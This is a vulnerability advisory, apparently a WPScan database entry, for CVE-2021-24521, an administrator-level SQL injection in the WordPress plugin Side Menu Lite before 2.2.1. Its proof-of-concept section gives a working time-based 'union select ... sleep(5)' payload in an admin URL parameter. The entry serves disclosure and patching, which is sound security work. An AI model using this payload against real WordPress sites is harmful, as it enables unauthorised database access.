WordPress Plugin Vulnerabilities

Side Menu Lite < 2.2.1 - Authenticated SQL Injection

Description

The plugin does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugin could perform an SQL Injection attack.

Proof of Concept

http://www.example.com/wp-admin/admin.php?page=side-menu-lite&tab=add-new&act=duplicate&id=0 union select 1,2,sleep(5)

Visiting the page will be delayed by 5 seconds, due to the sleep(5) injected in to the SQL query.

Affects Plugins

Plugin icon
side-menu-lite
Fixed in 2.2.1

References

CVE
CVE-2021-24521
URL
https://github.com/pang0lin/CVEproject/blob/main/wordpress_side-menu-lite_sqli.md

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
3.8 (low)

Miscellaneous

Original Researcher
pang0lin @webray.com.cn inc
Submitter
pang0lin @webray.com.cn inc
Submitter website
https://github.com/pang0lin
Verified
Yes
WPVDB ID
eb21ebc5-265c-4378-b2c6-62f6bc2f69cd

Timeline

Publicly Published
2021-06-28 (about 2 years ago)
Added
2021-07-12 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other

Published
Title
Published
2022-01-03
Title
Wicked Folders < 2.8.10 - Subscriber+ SQL Injection
Published
2014-08-01
Title
myLDlinker - SQL Injection
Published
2014-08-01
Title
Photoracer 1.0 - (id) SQL Injection
Published
2023-12-21
Title
BookIt < 2.4.4 - Authenticated(Administrator+) SQL Injection
Published
2022-12-05
Title
Contest Gallery < 19.1.5 - Author+ SQL Injection